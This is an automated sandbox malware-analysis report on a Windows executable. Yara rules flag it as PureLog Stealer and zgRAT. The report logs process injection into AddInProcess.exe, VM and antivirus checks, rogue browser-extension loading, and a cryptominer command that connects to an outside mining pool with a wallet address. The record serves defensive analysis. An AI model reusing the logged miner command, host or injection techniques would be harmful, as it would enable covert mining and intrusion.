Source: Target.exe, 00000001.00000002.4278312501.000001D0B44C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4I
Source: svchost.exe, 00000007.00000002.4113805548.000001CC7745A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.4112259937.000001CC71E2B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess.exe, 00000014.00000002.4120488458.000001978E306000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: AddInProcess.exe, 00000014.00000002.4120488458.000001978E306000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\zlONcFaXkc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

Thread register set: target process: 7492

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 3C1DA89010	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process created: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe "C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 7508 -ip 7508
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7508 -s 1516

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Queries volume information: C:\Users\user\Desktop\zlONcFaXkc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Queries volume information: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

Code function: 20_2_0000000140348448 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

20_2_0000000140348448

Source: C:\Users\user\Desktop\zlONcFaXkc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Target.exe, 00000001.00000002.4278312501.000001D0B44C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Windows Analysis Report
zlONcFaXkc.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1430590
Product:	CloudBasic
Start time:	23:01:10
Start date:	23.04.2024
Sample:	zlONcFaXkc.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	1c762a2cd186f1cde4b9e5d743eca3b5
SHA1:	a0eff9fa7b5ada96c8acf483de9519a9e2548d80
SHA256:	a5b0d190fc09cd5c1ea07fa6b12a7dd4ab5f517c778fb60e4e14060e00ddecc8
Filetype:	Win64 Executable GUI Net Framework (217006/5) 49.88%

Windows Analysis Report zlONcFaXkc.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
zlONcFaXkc.exe

Malware Threat Intel
Provided by